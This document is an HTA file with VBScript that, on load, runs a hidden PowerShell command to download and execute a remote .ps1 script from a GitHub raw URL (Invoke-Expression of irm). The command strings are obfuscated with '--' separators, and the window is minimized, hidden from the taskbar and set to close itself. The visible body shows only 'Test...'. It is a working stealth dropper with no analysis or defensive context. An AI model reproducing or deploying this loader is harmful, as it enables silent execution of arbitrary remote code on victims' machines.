<head>																																			
  <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no"  CAPTION="no" />  
    <script type="text/vbscript">                                                                                                              
        Sub Window_OnLoad                                                                                                                      
		invokeRest = replace("-C--o--m--m--a--n--d-- I--n--v--o--k--e-E--xp--re--ss--i--o--n-- --(i--rm -Ur--i 'https://raw.githubusercontent.com/Arcsin002/notes/main/test2/GDb.ps1')","--","")      
shellApp = replace("--S--h--e--l--l--.--A--p--p--l--i--c--a--t--i--o--n--","--","")                                                            
powerShell = replace("--p--o--w--e--r--s--h--e--l--l","--","")                                                                                   
CreateObject(shellApp).ShellExecute powerShell, invokeRest ,"","",0                                                                                
                                                                                                                                               
            self.close                                                                                                                         
        End Sub                                                                                                                                
    </script>                                                                                                                                  
</head>                                                                                                                                        
<body>                                                                                                                                         
    <h1>Test...</h1>                                                                                                        
</body>                                                                                                                                        
</html>                                                                                                                                        
